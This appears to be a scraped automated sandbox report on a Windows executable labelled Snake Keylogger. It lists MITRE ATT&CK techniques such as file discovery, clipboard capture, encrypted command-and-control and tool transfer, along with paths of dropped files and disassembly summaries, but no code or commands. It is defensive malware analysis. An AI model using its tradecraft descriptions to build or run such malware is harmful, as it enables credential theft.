Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Confirmation transfer Note AGS # 22-00379.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_wab.exe_15d6d0e0874d72d2fcd2c8c32686e616c5a2dc_9f72327e_a18ab8e7-2a27-4583-af50-06fda05251ea\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5987.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D13.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D71.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qrj1pcie.3uc.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xrvjjpg0.p3w.psm1

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exe

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exe:Zone.Identifier

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\ondskabsfuldhedernes.txt

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Jordfyldens\lokalplanrammes.sus

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ungilled.Cad

Windows Analysis Report
Confirmation transfer Note AGS # 22-00379.exe

Function 00403358 Relevance: 77.3, APIs: 27, Strings: 17, Instructions: 335
stringfilecomCOMMON

Function 004052D1 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405F0A Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207
stringCOMMON

Function 00405770 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 004038B2 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Function 00403C55 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Function 00402DBA Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre